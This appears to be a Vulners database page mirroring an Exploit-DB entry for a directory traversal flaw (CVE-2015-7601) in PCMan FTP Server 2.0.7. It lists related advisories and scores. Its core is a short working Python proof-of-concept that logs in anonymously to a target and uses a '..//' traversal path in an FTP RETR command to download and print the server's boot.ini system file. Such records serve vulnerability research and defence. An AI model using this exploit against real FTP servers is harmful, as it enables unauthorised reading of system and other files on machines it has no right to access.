Lucene search
+L

PCMan FTP Server 2.0.7 - Directory Traversal

🗓️ 28 Sep 2015 00:00:00Reported by Jay TurlaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

PCMan FTP Server 2.0.7 - Directory Traversal vulnerability on Windows X

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2015-7601
29 May 201815:50
circl
cnvd
CNVD
PCMan FTP Server Information Disclosure Vulnerability
10 Oct 201500:00
cnvd
cve
CVE
CVE-2015-7601
29 Sep 201519:00
cve
cvelist
Cvelist
CVE-2015-7601
29 Sep 201519:00
cvelist
metasploit
Metasploit
PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure
28 Sep 201500:00
metasploit
nvd
NVD
CVE-2015-7601
29 Sep 201519:59
nvd
packetstorm
Packet Storm
PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure
1 Sep 202400:00
packetstorm
prion
Prion
Directory traversal
29 Sep 201519:59
prion
#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Directory Traversal
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# description: PCMAN FTP 2.07 is vulnerable to Directory Traversal (quick and dirty code just for PoC)

from ftplib import FTP

ftp = FTP(raw_input("Target IP: "))
ftp.login()
ftp.retrbinary('RETR ..//..//..//..//..//..//..//..//..//..//..//boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Sep 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.8
EPSS0.58334
37